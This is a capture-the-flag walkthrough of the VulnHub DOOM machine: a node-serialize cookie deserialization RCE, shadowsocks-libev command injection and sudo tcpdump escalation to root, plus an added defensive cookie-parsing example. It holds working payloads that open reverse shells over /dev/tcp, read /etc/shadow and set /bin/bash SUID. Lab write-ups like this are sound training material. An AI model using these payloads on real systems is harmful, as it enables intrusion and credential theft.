DOOM -VULNHUB- Linux
Complete walkthrough of the session content:
RECONNAISSANCE PHASE:
NETWORK DISCOVERY:
We are going to use the arp-scan tool to discover the target machine. This software sends ARP requests in broadcast mode and waits for the hosts' replies over the same protocol, as you can see below:
NMAP:
In this step, from the attacker machine we gather information about the open ports and services of the target machine. We can use some options to execute scripts and obtain information about vulnerabilities on the external host.
nmap -sC -sV -v -n -T4 -p - 192.168.1.43 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 19:56 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating Ping Scan at 19:56
Scanning 192.168.1.43 [2 ports]
Completed Ping Scan at 19:56, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:56
Scanning 192.168.1.43 [65535 ports]
Discovered open port 22/tcp on 192.168.1.43
Discovered open port 666/tcp on 192.168.1.43
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 66.67% done; ETC: 19:56 (0:00:01 remaining)
Completed Connect Scan at 19:56, 2.65s elapsed (65535 total ports)
Initiating Service scan at 19:56
Scanning 2 services on 192.168.1.43
Completed Service scan at 19:56, 11.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.43.
Initiating NSE at 19:56
Completed NSE at 19:56, 0.12s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Nmap scan report for 192.168.1.43
Host is up (0.00031s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
NSE: Script Post-scanning.
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Initiating NSE at 19:56
Completed NSE at 19:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.18 seconds
The conclusion of the nmap scan is that we found the following open ports and services:
EXPLOITATION:
22 ssh:
The OpenSSH service is enabled and active, as you can see below:
Using the service name and version, we look for an exploit with the searchsploit tool:
kali@kali:~/VULNHUB/DOOM/nmap$ searchsploit OpenSSH 7.7
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
And with this Python exploit we can enumerate the users that the operating system allows to connect to the target server:
666/tcp http:
Using whatweb we evaluate the target service:
whatweb http://192.168.1.43:666
http://192.168.1.43:666 [200 OK] Cookies[profile], Country[RESERVED][ZZ], HttpOnly[profile], IP[192.168.1.43], X-Powered-By[Express]
We access the service from the browser:
As you can see below, the server responds with a session cookie named "profile":
kali@kali:~/VULNHUB/DOOM/exploits$ curl -X GET http://192.168.1.43:666 -v
Note: Unnecessary use of -X or --request, GET is already inferred.
* Trying 192.168.1.43:666...
* Connected to 192.168.1.43 (192.168.1.43) port 666 (#0)
> GET / HTTP/1.1
> Host: 192.168.1.43:666
> User-Agent: curl/7.72.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Set-Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D; Max-Age=900; Path=/; Expires=Thu, 02 Sep 2021 18:47:33 GMT; HttpOnly
< Content-Type: text/html; charset=utf-8
< Content-Length: 36
< ETag: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
< Date: Thu, 02 Sep 2021 18:32:33 GMT
< Connection: keep-alive
<
* Connection #0 to host 192.168.1.43 left intact
Under Construction, Come Back Later!
Interesting. Let's review the cookie content (the trailing %3D is the URL-encoded "=" padding, so it is restored before decoding):
echo "eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0=" | base64 -d
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
If we change the cookie's username parameter, we find that the server's response changes to an error that exposes useful information:
From the response data we understand a couple of things:
1. There is a user directory with the web server content at:
/home/nodeadmin/.web/
and, of course, a Linux operating system user name: nodeadmin
2. The microservice uses the Express Node framework.
Searching for the error on the internet, and finally using the following post, we understand that the Node.js application uses a vulnerable library: node-serialize
https://github.com/indrefi/Insecure-Deserialization-NodeJS-RCE
We install the library on the attacker machine in order to understand the vulnerability:
kali@kali:~/VULNHUB/DOOM/exploits$ npm install node-serialize
added 1 package, and audited 2 packages in 2s
1 critical severity vulnerability
Some issues need review, and may require choosing
a different dependency.
Run `npm audit` for details.
kali@kali:~/VULNHUB/DOOM/exploits$ npm audit
# npm audit report
node-serialize *
Severity: critical
Code Execution through IIFE - https://npmjs.com/advisories/311
No fix available
node_modules/node-serialize
1 critical severity vulnerability
Some issues need review, and may require choosing
a different dependency.
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
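As an added example (not code from the original post or from the DOOM machine), this is how the "profile" cookie would be parsed on the defending side: strict JSON only, string-only fields, and an explicit check for the _$$ND_FUNC$$_ marker that node-serialize's unserialize() would otherwise evaluate. The username allow-list pattern is an assumption for the example; the first sample cookie is the one the server issued in the curl output above, the other two are constructed.

```javascript
// Added example, not from the original post. The vulnerable app hands the
// base64-decoded cookie to node-serialize, which eval()s any string value tagged
// with _$$ND_FUNC$$_. The safe path below never evaluates anything: it decodes,
// parses with JSON.parse, enforces a strict shape and flags the marker for logging.
const ND_FUNC_MARKER = "_$$ND_FUNC$$_";
const USERNAME_RE = /^[A-Za-z0-9_-]{1,32}$/; // allow-list; an assumption for this example

// Express emits the cookie URL-encoded ("%3D" is "="), so undo that before base64.
function decodeProfileCookie(raw) {
  return Buffer.from(decodeURIComponent(raw), "base64").toString("utf8");
}

// Builds cookies in the same encoding as the Set-Cookie header (used for the samples).
function encodeProfileCookie(obj) {
  return encodeURIComponent(Buffer.from(JSON.stringify(obj), "utf8").toString("base64"));
}

function parseProfileSafely(raw) {
  let obj;
  try {
    obj = JSON.parse(decodeProfileCookie(raw));
  } catch (e) {
    return { ok: false, reason: "not valid JSON" };
  }
  if (obj === null || typeof obj !== "object" || Array.isArray(obj)) {
    return { ok: false, reason: "not a JSON object" };
  }
  for (const [key, value] of Object.entries(obj)) {
    if (typeof value !== "string") return { ok: false, reason: "field " + key + " is not a string" };
    // A string carrying the marker is a deserialization attempt: reject and log, never eval.
    if (value.includes(ND_FUNC_MARKER)) return { ok: false, reason: "field " + key + " carries " + ND_FUNC_MARKER };
  }
  if (!USERNAME_RE.test(obj.username || "")) return { ok: false, reason: "username fails allow-list" };
  return { ok: true, username: obj.username };
}

// Sample 1: the cookie the DOOM server issued (copied from the curl output on this page).
// Its decoded payload is not even valid JSON ("Expires=":Friday ... is unquoted), so a strict parser rejects it.
const PAGE_COOKIE = "eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D";
// Sample 2 (constructed): a cookie of the shape a node-serialize payload takes.
const TAGGED_COOKIE = encodeProfileCookie({ username: ND_FUNC_MARKER + "function(){}()" });
// Sample 3 (constructed): a benign cookie that passes every check.
const BENIGN_COOKIE = encodeProfileCookie({ username: "Admin", csrftoken: "constructed-token" });

for (const c of [PAGE_COOKIE, TAGGED_COOKIE, BENIGN_COOKIE]) console.log(parseProfileSafely(c));
```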
At this point, with the following payload modified for our vulnerable variable, username:
{"username":"_$$ND_FUNC$$_function(){\n\tvar HOST = \"192.168.1.34\";\n\tvar PORT = 1337;\n var net = require(\"net\"),\n cp = require(\"child_process\"),\n sh = cp.spawn(\"/bin/bash\", []);\n var client = new net.Socket();\n client.connect(PORT, HOST, function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return /a/; // Prevents the Node.js application form crashing\n}"}
And we exploit the RCE vulnerability on the target server:
After several attempts we finally get a reverse shell using the deserialization RCE in the cookie parameter:
Payload :
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('/bin/bash -i >& /dev/tcp/192.168.1.34/9898 0>&1',(e,out,err)=>{console.log(out);}); }()"}
(Base64 encoded)
Execute:
Reverse Shell:
PRIVILEGE ESCALATION:
After reviewing information on the internet about this process, executed as the user fireman:
[nodeadmin@localhost tmp]$ ps aux | grep fireman
ps aux | grep fireman
root 849 0.0 0.1 301464 4496 ? S 14:22 0:00 su fireman -c /usr/local/bin/ss-manager
fireman 857 0.0 0.0 37072 3940 ? Ss 14:22 0:00 /usr/local/bin/ss-manager
nodeadm+ 1097 0.0 0.0 213788 1024 ? S 14:30 0:00 grep --color=auto fireman
We find that it has a vulnerable library, "shadowsocks-libev"; the information and the PoC are at the following link:
https://github.com/shadowsocks/shadowsocks-libev/issues/1734
Execution:
[nodeadmin@localhost ~]$ nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}nc -u 127.0.0.1 8839
ok
And we verify that the PoC executed successfully:
[nodeadmin@localhost tmp]$ ls -ltrh
ls -ltrh
total 0
drwx------ 3 root root 60 Sep 3 14:22 systemd-private-edfab2bed0bd42bd917fc5f11223c8dc-rtkit-daemon.service-Joaoj3
drwx------ 3 root root 60 Sep 3 14:22 systemd-private-edfab2bed0bd42bd917fc5f11223c8dc-chronyd.service-zrlz3y
-rw------- 1 fireman fireman 0 Sep 3 14:29 evil
In that case we can spawn a shell with the fireman user's privileges, using the same PoC with a reverse shell command instead of creating a temporary file:
[nodeadmin@localhost tmp]$ nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"|| /bin/bash -i >& /dev/tcp/192.168.1.34/9999 0>&1 ||"}nc -u 127.0.0.1 8839
And of course, we are in:
And finally, from the fireman user's bash console, we find that it can execute several commands with sudo and without a password:
[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
One of them, tcpdump, lets you obtain a bash shell with sudo privileges, as you can see at GTFOBins:
https://gtfobins.github.io/gtfobins/tcpdump/#sudo
Obtain data from the shadow file ("privilege escalation test"):
sh-4.4$ echo $'id\ncat /etc/shadow' > /tmp/.test
echo $'id\ncat /etc/shadow' > /tmp/.test
sh-4.4$ chmod +x /tmp/.test
chmod +x /tmp/.test
sh-4.4$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
11 packets received by filter
0 packets dropped by kernel
sh-4.4$ uid=0(root) gid=0(root) groups=0(root)
Using the same procedure we can obtain the final CTF flag:
sh-4.4$ echo $'ls /root\ncat /root/*' > /tmp/.test
echo $'ls /root\ncat /root/*' > /tmp/.test
sh-4.4$ chmod +x /tmp/.test
chmod +x /tmp/.test
sh-4.4$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
And why not obtain an interactive shell?
But after the connection, the original process does not wait for a response, so the shell could not be interactive:
echo $'/bin/bash -i >& /dev/tcp/192.168.1.34/9990 0>&1\ncat /root/*' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
kali@kali:~$ nc -nvlp 9990
listening on [any] 9990 ...
connect to [192.168.1.34] from (UNKNOWN) [192.168.1.43] 59476
whoami
id
In that case we can change the SUID permission and the owner of /bin/bash (the system's terminal shell) using the same procedure:
echo $'chown root:root /bin/bash\nchmod +s /bin/bash\nls -ltrh /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
And we exploit the misconfiguration with the following command:
/bin/bash -p